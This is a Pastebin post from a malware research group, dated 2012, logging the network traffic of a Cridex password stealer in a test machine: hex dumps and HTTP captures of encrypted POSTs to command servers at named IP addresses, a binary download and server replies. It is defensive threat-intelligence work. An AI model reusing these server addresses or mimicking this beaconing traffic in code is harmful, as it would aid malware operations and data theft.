API tools faq
paste
Advertisement
MalwareMustDie

#MalwareMustDie - PD079-BHEK-20121209-3

MalwareMustDie
Dec 9th, 2012
1,404
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.50 KB | None | 0 0
raw download clone embed print report
  1. ===========================--
  2. #MalwareMustDie - BHEK2 PD079
  3. Cridex - Password stealer
  4. NETWORK ACTIVITY EVIDENCE
  5. @unixfreaxjp /malware]$ date
  6. Sun Dec 9 21:21:01 JST 2012
  7. ===========================
  8.  
  9. HTTP/1.1 POST request was sent to 180.235.150.72:8080 contains encrypted data:
  10.  
  11. // 192.168.7.84 ---> 180.235.150.72 HTTP/POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  12.  
  13. 00000000 50 4f 53 54 20 2f 4e 35 6e 6d 4c 43 41 41 41 2f POST /N5 nmLCAAA/
  14. 00000010 4c 78 63 71 4b 41 41 2f 47 4c 6b 4f 56 43 41 41 LxcqKAA/ GLkOVCAA
  15. 00000020 41 41 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 41 63 AA/ HTTP /1.1..Ac
  16. 00000030 63 65 70 74 3a 20 2a 2f 2a 0d 0a 55 73 65 72 2d cept: */ *..User-
  17. 00000040 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 Agent: M ozilla/5
  18. 00000050 2e 30 20 28 57 69 6e 64 6f 77 73 3b 20 55 3b 20 .0 (Wind ows; U;
  19. 00000060 4d 53 49 45 20 37 2e 30 3b 20 57 69 6e 64 6f 77 MSIE 7.0 ; Window
  20. 00000070 73 20 4e 54 20 36 2e 30 3b 20 65 6e 2d 55 53 29 s NT 6.0 ; en-US)
  21. 00000080 0d 0a 48 6f 73 74 3a 20 31 38 30 2e 32 33 35 2e ..Host: 180.235.
  22. 00000090 31 35 30 2e 37 32 3a 38 30 38 30 0d 0a 43 6f 6e 150.72:8 080..Con
  23. 000000A0 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 34 37 tent-Len gth: 347
  24. 000000B0 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 ..Connec tion: Ke
  25. 000000C0 65 70 2d 41 6c 69 76 65 0d 0a 43 61 63 68 65 2d ep-Alive ..Cache-
  26. 000000D0 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 Control: no-cach
  27. 000000E0 65 0d 0a 0d 0a e....
  28. 000000E5 15 7d 92 25 cf 68 92 5b ae 96 b0 62 ed 8f 24 fb .}.%.h.[ ...b..$.
  29. 000000F5 5b bb 87 19 f4 34 6c d9 95 67 20 a7 fb 66 f3 6c [....4l. .g ..f.l
  30. 00000105 3f 25 7a f7 41 b1 67 6a 12 c3 99 5d ea 1a cd b7 ?%z.A.gj ...]....
  31. 00000115 cf 67 e6 ca 91 50 f2 2d ad 89 41 4a d4 65 d7 c7 .g...P.- ..AJ.e..
  32. 00000125 d2 32 d7 16 b0 fd 49 c2 52 e6 56 cc 5a 71 1e 50 .2....I. R.V.Zq.P
  33. 00000135 9f 0a 76 4d 44 9d 0e 25 ec 0a 5b 53 ba d3 20 0c ..vMD..% ..[S.. .
  34. 00000145 08 cb 10 ce 37 dc 2a 12 b5 67 94 1c c7 1e 02 95 ....7.*. .g......
  35. 00000155 c8 c8 37 9d 05 90 8a 28 9e 5d 7a 59 a4 d3 1e a4 ..7....( .]zY....
  36. 00000165 65 0a 06 8a 9a 27 2c 2e 48 85 25 9b e3 24 05 0b e....',. H.%..$..
  37. 00000175 59 36 d2 a2 b2 8e 58 90 ba 2e 64 96 4a 02 85 bc Y6....X. ..d.J...
  38. 00000185 95 58 2c e0 b2 d9 1f 62 df c4 a2 b3 3d 7d 6a 65 .X,....b ....=}je
  39. 00000195 38 f1 ea 27 36 a6 9a 35 9b 66 32 a2 28 c1 01 56 8..'6..5 .f2.(..V
  40. 000001A5 73 c7 7b 23 e7 b2 a7 26 ef c8 8b 64 00 3b 9a a2 s.{#...& ...d.;..
  41. 000001B5 da a3 08 ec 91 60 71 9e 99 60 fc 2d 19 9a 0f 54 .....`q. .`.-...T
  42. 000001C5 32 25 ed 7d a7 33 dc 7e db e3 97 a2 69 e9 34 ac 2%.}.3.~ ....i.4.
  43. 000001D5 87 47 13 69 71 74 2f b7 cf 07 99 42 14 4f 6c 5b .G.iqt/. ...B.Ol[
  44. 000001E5 b3 6c 19 0a ee a0 7a 77 cb d1 a9 ba a5 18 d9 4c .l....zw .......L
  45. 000001F5 22 ed 4a ce 00 1e 1d ec 90 80 a4 26 4f 6a 8e cc ".J..... ...&Oj..
  46. 00000205 b0 3e 04 2f 9c 73 91 1a e9 7c 1e 75 17 de c5 f4 .>./.s.. .|.u....
  47. 00000215 c3 b8 3a 59 74 98 ca de 6b 56 bc 4f bb ad 74 d7 ..:Yt... kV.O..t.
  48. 00000225 1f dd 8a e3 5c 25 ac 15 50 02 41 a0 4a d7 c1 c6 ....\%.. P.A.J...
  49. 00000235 52 70 6c 4c 1c 6d 90 12 ac 9d f9 RplL.m.. ...
  50.  
  51. Which answered by sending the binary from 180.235.150.72 to TestPC:
  52.  
  53. // 180.235.150.72 ===> 192.168.7.84 TCP [TCP segment of a reassembled PDU]
  54.  
  55. Server: nginx/1.0.10
  56. Date: Sun, 09 Dec 2012 07:19:02 GMT
  57. Content-Type: text/html; charset=UTF-8
  58. Transfer-Encoding: chunked
  59. Connection: keep-alive
  60. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  61. Vary: Accept-Encoding
  62.  
  63. 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d HTTP/1.1 200 OK.
  64. 00000010 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 .Server: nginx/1
  65. 00000020 2e 30 2e 31 30 0d 0a 44 61 74 65 3a 20 53 75 6e .0.10..D ate: Sun
  66. 00000030 2c 20 30 39 20 44 65 63 20 32 30 31 32 20 30 37 , 09 Dec 2012 07
  67. 00000040 3a 31 39 3a 30 32 20 47 4d 54 0d 0a 43 6f 6e 74 :19:02 G MT..Cont
  68. 00000050 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 ent-Type : text/h
  69. 00000060 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 tml; cha rset=UTF
  70. 00000070 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 -8..Tran sfer-Enc
  71. 00000080 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a oding: c hunked..
  72. 00000090 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 Connecti on: keep
  73. 000000A0 2d 61 6c 69 76 65 0d 0a 58 2d 50 6f 77 65 72 65 -alive.. X-Powere
  74. 000000B0 64 2d 42 79 3a 20 50 48 50 2f 35 2e 33 2e 31 38 d-By: PH P/5.3.18
  75. 000000C0 2d 31 7e 64 6f 74 64 65 62 2e 30 0d 0a 56 61 72 -1~dotde b.0..Var
  76. 000000D0 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 y: Accep t-Encodi
  77. 000000E0 6e 67 0d 0a 0d 0a 66 33 62 0d 0a bb aa ef 6f 93 ng....f3 b.....o.
  78. 000000F0 90 d7 73 f7 37 87 c1 c0 79 61 6f 30 b5 fb 96 65 ..s.7... yao0...e
  79. 00000100 c0 cf 78 a3 b6 7e b1 87 29 30 90 a5 5f 09 fc d5 ..x..~.. )0.._...
  80. 00000110 fd ca a6 f1 88 4d 29 a7 48 dc 28 f7 42 83 c2 1b .....M). H.(.B...
  81. 00000120 99 7b dd ca a6 a3 b0 87 74 5c 72 2f f6 3e c2 28 .{...... t\r/.>.(
  82. : :
  83. : :
  84. 0006DC14 fb b5 0b 98 5d d8 bd b1 69 8c 26 79 a1 d5 2c b6 ....]... i.&y..,.
  85. 0006DC24 57 55 f0 ee cd 5b 42 4a 13 4e 3e 5f 92 5e 17 4e WU...[BJ .N>_.^.N
  86. 0006DC34 dd b5 64 90 d4 4e a8 b0 36 03 f1 de 58 a9 d3 69 ..d..N.. 6...X..i
  87. 0006DC44 1c ef 59 f2 20 33 18 24 a6 74 42 23 04 14 19 c9 ..Y. 3.$ .tB#....
  88. 0006DC54 92 f4 88 1e e9 68 05 1d 6b e2 b8 e3 3f f4 ea 85 .....h.. k...?...
  89. 0006DC64 84 2f 81 7d c8 6e 96 a5 9a 88 7a c2 72 ee d7 2f ./.}.n.. ..z.r../
  90. 0006DC74 45 6c 0d eb 0a f3 7b c2 21 68 1b d0 01 2e 70 45 El....{. !h....pE
  91. 0006DC84 8e 0d 0a 30 0d 0a 0d 0a ...0....
  92.  
  93. There are more than 3(three) times tries to handshake connection with remote IP: 132.248.49.112
  94. 192.168.7.84 ===> 132.248.49.112 TCP netarx > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  95. 132.248.49.112 => 192.168.7.84 TCP http-alt > netarx [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  96.  
  97. Also it tries to handshake connection with remote IP: 113.130.65.77
  98. 192.168.7.84 ===> 113.130.65.77 TCP optima-vnet > http-alt [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
  99. 113.130.65.77 ==> 192.168.7.84 TCP http-alt > optima-vnet [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
  100.  
  101. Then it communicate in HTTP with 203.113.98.131:80
  102. 192.168.7.84 ===> 203.113.98.131 HTTP POST /asp/intro.php HTTP/1.0
  103. Request sent:
  104. --------------
  105. POST /asp/intro.php HTTP/1.0
  106. Host: 203.113.98.131
  107. Accept: */*
  108. Accept-Encoding: identity, *;q=0
  109. Content-Length: 251
  110. Connection: close
  111. Content-Type: application/octet-stream
  112. Content-Encoding: binary
  113. User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
  114. CRYPTED0...DK.V..aa..c.....PI%.^D.|2.s;.p..T=....*.........
  115. MX.../......../.;(.dl7).c..).......Jk.rO..e....!].......|.ej
  116. ......6.H.y4J_.......f2...8..P.V.....oy.....$...6.z.8.. .0..
  117. .1..H,.....nCa.Z.....?I...r.q-.........7f[......O....vX0-.&.
  118. -D.D5.......
  119.  
  120. Response received:
  121. -------------------
  122. HTTP/1.1 200 OK
  123. Server: nginx/1.0.10
  124. Date: Sun, 09 Dec 2012 07:21:47 GMT
  125. Content-Type: text/html; charset=windows-1251
  126. Connection: close
  127. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  128. Vary: Accept-Encoding
  129. Content-Length: 16
  130.  
  131. STATUS-IMPORT-OK
  132.  
  133.  
  134. Then it also connect to remote IP: 173.224.221.135:8080 to send the POST data,
  135. with the following recorded communication:
  136.  
  137. 192.168.7.84 173.224.221.135 HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  138.  
  139. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  140. Accept: */*
  141. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  142. Host: 173.224.221.135:8080
  143. Content-Length: 408
  144. Connection: Keep-Alive
  145. Cache-Control: no-cache
  146. ..c....S..l.........r.......6.l{IMs6.....S......uOKvE...u..}Q?&UM..j..`...%=W+3.........
  147. .r......e..md.h.%.O...0]fr......M.M.....o..P.cm& ......[.(j.hW....M. Y..Y....)eL.....u..q
  148. @..>.1.y..k.A=.!.....hZ.[...........ln..~..`M..>......|t."S..Y.o-fx.......
  149. 4..Bv...
  150. .+.}}..2C.&....VSmZO...g6..=?P.6......,6'_T.J
  151. .\..!GZ.7..#..........:F.r...e
  152. .........."..tPWJs... ....+.".U....f&#..!."..0.8|s?.LNp.}......D.tI.0.
  153.  
  154. HTTP/1.1 200 OK
  155. Server: nginx/1.0.10
  156. Date: Sun, 09 Dec 2012 07:22:32 GMT
  157. Content-Type: text/html; charset=UTF-8
  158. Connection: keep-alive
  159. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  160. Vary: Accept-Encoding
  161. Content-Length: 165
  162. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
  163. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
  164. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
  165. 2U...`......hJ....^.<..
  166. e....
  167.  
  168. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  169. Accept: */*
  170. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  171. Host: 173.224.221.135:8080
  172. Content-Length: 387
  173. Connection: Keep-Alive
  174. Cache-Control: no-cache
  175. B..L.l.............qe..x..p
  176. e.,-........4.q...1X..|..........O...rP.5cO<.B./...q.......%...T..........
  177. ^.H...J.n.N.l0.s ..d..w}E.....]....B'..Qt..k..Qu.....J"z........Y...:.....u.....jL.
  178. ....#|......=...$..*.*..z......x......zd..y@+4..+./
  179. ..*...|N..aZY.@)...}...r6..^y.N0{..7.<c.=) ._..V..5:...g........f........~=...R..pZ....v=d..!.......p.......
  180. $=...q..:#....c.N..]...w..kA....R.P}U[5.
  181.  
  182. HTTP/1.1 200 OK
  183. Server: nginx/1.0.10
  184. Date: Sun, 09 Dec 2012 07:22:33 GMT
  185. Content-Type: text/html; charset=UTF-8
  186. Connection: keep-alive
  187. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  188. Vary: Accept-Encoding
  189. Content-Length: 165
  190. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
  191. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
  192. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
  193. 2U...`......Qh......>&.......
  194.  
  195.  
  196. It sends the POST data to 206.176.226.157:8080 as follows.....
  197. 192.168.7.84 ===>206.176.226.157 HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  198. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
  199. Accept: */*
  200. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
  201. Host: 206.176.226.157:8080
  202. Content-Length: 387
  203. Connection: Keep-Alive
  204. Cache-Control: no-cache
  205. o...C.G..rj.....X.......M.2.X;..c2.f...~.....9.6..x..=d..K.p...8.b.J.H.. ?.S..F.:8.g....3l..J..f....Ww....ng...~
  206. ..7FS..~P...vlB....]....B'..Qt..k....\..e6..........]...M...O..$.\U..<
  207. ....:P...GO.W.Uv.A(.l.............*.s.$....*O......su..G....d.;m.J]A.........!...+...
  208. (mF.I....-
  209. ..$. .;....WS..rj.nH:.\.V.5.Z...
  210. ..z..........V.......8.....6.+h...Ju.4;....)#h..D.$=.).....3.:\q.r^.5...LHTTP/1.1 200 OK
  211.  
  212. Server: nginx/1.0.10
  213. Date: Sun, 09 Dec 2012 07:23:09 GMT
  214. Content-Type: text/html; charset=UTF-8
  215. Connection: keep-alive
  216. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  217. Vary: Accept-Encoding
  218. Content-Length: 165
  219. ..N..&..D[.4.$..H....8..CL|j.(l.93.QP..?.
  220. .N%9M.k.......?...Z....|..=6.U...3o.h...F...5
  221. .=...Q.L.'.....H..p.1..I=.....|..j..!..}.9..^kK
  222. 2U...`........X..a%..........
  223. ----
  224. #MalwareMustDie!!!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!